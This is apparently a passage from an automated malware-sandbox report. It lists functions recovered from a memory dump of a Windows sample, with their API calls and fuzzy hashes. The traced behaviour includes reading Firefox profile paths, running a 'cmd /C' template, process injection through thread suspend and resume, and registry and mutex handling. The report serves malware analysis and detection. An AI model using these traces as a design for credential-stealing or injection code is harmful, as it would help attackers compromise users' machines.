  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
